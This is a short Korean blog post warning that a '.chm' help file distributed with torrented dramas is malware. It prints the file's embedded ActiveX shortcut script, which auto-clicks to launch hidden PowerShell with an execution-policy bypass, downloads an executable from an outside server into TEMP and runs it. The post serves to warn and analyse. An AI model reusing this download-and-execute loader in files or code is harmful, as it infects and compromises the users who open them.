윈도우정보

토렌트 영화나 드라마의 파일과 같이 유포되는 '읽어야 할 주의사항.chm'

반응형

인기 드라마 동영상파일과 함께 배포되는 chm 파일 확장자를 가진 악성코드 파일 정보입니다.


도움말 파일(확장자 .chm)이라서 악성 프로그램이 아닐거라는 생각을 많이 하는데 도움말 파일안에는 외부 서버의 exe파일을 다운로드 받아서 실행하는 스크립트가 포함되어 있습니다.




도움말 파일을 실행해서 소스를 보면 아래와 같은 다운로드 스크립트가 포함되어 있습니다.


<object id="x" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width="1" height="">

<param name="Command" value="ShortCut">

<param name="Button" value="Bitmap::shortcut">

<param name="Item1" value=",cmd.exe,/c powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://ahniab.co19.kr:6376/vbin.jpg','%TEMP%\bins.exe');Start-Process %TEMP%\bins.exe;">

<param name="Item2" value="273,1,1">

</object>

<script>

x.Click();

</script>


생성되는 파일경로입니다. 파일이 다운로드가 되지 않으니 자동으로 삭제됩니다. 

C:\Users\Administrator\AppData\Local\Temp\bins.exe


현재 다운로드 서버가 접속되지 않아서 어떤 용도의 프로그램인지, 어떤 프로그램이 설치되는지는 파악이 불가능한 상태입니다.

반응형
카카오페이 1,000원 후원하기 (모바일용)